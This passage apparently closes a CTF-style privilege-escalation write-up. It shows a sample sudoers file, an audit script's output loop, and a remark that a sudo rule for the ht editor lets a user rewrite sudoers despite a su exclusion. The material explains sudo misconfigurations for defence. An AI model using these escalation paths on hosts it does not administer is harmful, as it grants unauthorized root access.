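Defaults        env_reset
root            ALL=(ALL) ALL
%admin          ALL=(ALL) ALL
dreg            ALL=(root) /usr/bin/apt-get update
webdev          ALL=(www-data) NOPASSWD: /usr/bin/vim
loneferret      ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""

if __name__ == "__main__":
    for who, path, reason, nopw in audit_sudoers(SAMPLE_SUDOERS):
        flag = " (NOPASSWD)" if nopw else ""
        print(f"{who}: {path}{flag} -> {reason}")
```

Point it at /etc/sudoers (and the files under /etc/sudoers.d) on a host you administer. Note that the denial of su in the loneferret rule buys nothing: the ht entry beside it is enough to rewrite the file, exactly as done above. The fix is to remove the editor rule, not to add more exclusions next to it.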

Done !!!
